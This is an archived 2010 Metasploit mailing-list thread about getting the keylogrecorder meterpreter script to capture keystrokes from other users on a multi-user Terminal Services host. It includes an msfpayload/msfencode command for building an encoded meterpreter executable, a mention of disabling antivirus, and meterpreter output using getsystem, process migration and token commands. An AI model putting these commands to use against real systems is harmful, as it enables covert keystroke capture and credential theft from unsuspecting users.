[prev in list] [next in list] [prev in thread] [next in thread]
List: metasploit-framework
Subject: Re: [framework] keylogrecorder not working with Terminal Service
From: Richard Miles <richard.k.miles () googlemail ! com>
Date: 2010-12-14 14:50:26
Message-ID: AANLkTimo0cr=3Vu=D3Q2B42iOybVpBDdGuwqAjBeuJM9 () mail ! gmail ! com
[Download RAW message or body]
Hi
>> Nice. Can I have a beta of this smartlocker?
>
> not sure it will help you this time as the "fix" is to just pick the right one
I did this change on the code, and it works in normal cases, where you
have a explorer.exe for each user, but my case is a custom system
where no user has explorer.exe associated, they have just the
application directly launched.
>> Or can you share insides of details of how you solved this problem?
>
> sure, pick the user you want to keylog, manually migrate into their
> process then run the keylogger
As I don't have a explorer.exe I had to migrate to the target
application of any other running, the problem is that when I try to
migrate to the target application is keeps "Migrating" forever and
never come back. Like a freeze process. The only solution after
minutes is kill the meterpreter session and consequently the
application dies. Any idea?
Thanks
>
>
>> On Thu, Dec 2, 2010 at 5:47 PM, c0lists <lists@carnal0wnage.com> wrote:
>>> Actually mubix and I will be releasing smartlocker shortly that should
>>> handle some of the issues with multiple winlogon sessions.
>>>
>>> guess this is a good kick in the butt to do that...
>>>
>>> -CG
>>>
>>> On Thu, Dec 2, 2010 at 6:17 PM, Richard Miles
>>> <richard.k.miles@googlemail.com> wrote:
>>>> Hi
>>>>
>>>> I ended unloading my antivirus and I was able to execute mspayload
>>>> portable (last release available at Metasploit website), most of the
>>>> features works very well, but when I try create a .exe payloads it's
>>>> created but not on the correct way. I created using:
>>>>
>>>> C:\Temp\ruby\bin>ruby.exe ..\..\msf3\msfpayload
>>>> windows/meterpreter/bind_tcp LHOST=127.0.0.1 R | ruby.exe
>>>> ..\..\msf3\msfencode -e x86/shikata_ga_nai -t exe > test.exe
>>>>
>>>> [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
>>>>
>>>> The test.exe was created, but when executed it start and finish
>>>> (crash?) on the same second. If I generate the same payload from my
>>>> Linux box it works very well. So, I believe it may be a bug.
>>>>
>>>> The other thing that called my attention is keylogrecorder from
>>>> Carlos, it doesn't appear to work in Terminal Service environment with
>>>> multiple users, See the output:
>>>>
>>>> meterpreter > run keylogrecorder -c 0
>>>> [*] explorer.exe Process found, migrating into 3247
>>>> [*] Migration Successful!!
>>>> [*] explorer.exe Process found, migrating into 3622
>>>> [-] Error in script: Rex::RuntimeError Cannot migrate into this
>>>> process (insufficient privileges)
>>>> meterpreter > getuid
>>>> Server username: MyDomain\User01
>>>> meterpreter > rev2self
>>>> meterpreter > getuid
>>>> Server username: MyDomain\User01
>>>> meterpreter > drop_token
>>>> Relinquished token, now running as: MyDomain\User01
>>>> meterpreter > getuid
>>>> Server username: MyDomain\User01
>>>> meterpreter >
>>>>
>>>> It clear finds the first exploit and migrate to it, but it continues
>>>> on the loop and try to find the second user to migrate, but it failed
>>>> because the previous migrated process is not administrator. I also
>>>> tried to revert my privilege to admin with rev2self or drop_token but
>>>> it doesn't work.
>>>>
>>>> My workaround was modify the script to look for a specific pid and end
>>>> the loop when it found. But, should be nice a patch to fix it
>>>> properly. Maybe ask for the name of the user to inject the keylogger,
>>>> or maybe restore the older privileges before migrate on the next,
>>>> maybe on this way we could keylogger all the sessions at the same
>>>> time?
>>>>
>>>> Also, on this server I found a strange situation, where different
>>>> sessions do not have a explorer.exe, consequently the script failed. I
>>>> found a just a few executables in use for this users. I used pslist
>>>> and I got the main process (using tree view - there are 2 main
>>>> process), and I modified the keylogger to migrate to this process, but
>>>> the crazy is that is just freeze.
>>>>
>>>>
>>>> meterpreter > getsystem
>>>> ...got system (via technique 1).
>>>> meterpreter > run keylogrecorder -c 0 -t 15
>>>> [*] spshell.exe Process found, migrating into 1980
>>>>
>>>> And it keep on this screen forever. Depending on the process, it just
>>>> get stopped forever on this stage. On the other, it's also get stopped
>>>> forever on this stage but the main process day. Anyone have seen
>>>> anything like that? Ideas why it happens? How to solve the situation?
>>>>
>>>> I'm unable to view to record the user activity in this case. Anyone
>>>> has any suggestion?
>>>>
>>>> Thanks
>>>> _______________________________________________
>>>> https://mail.metasploit.com/mailman/listinfo/framework
>>>>
>>>
>>
>
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic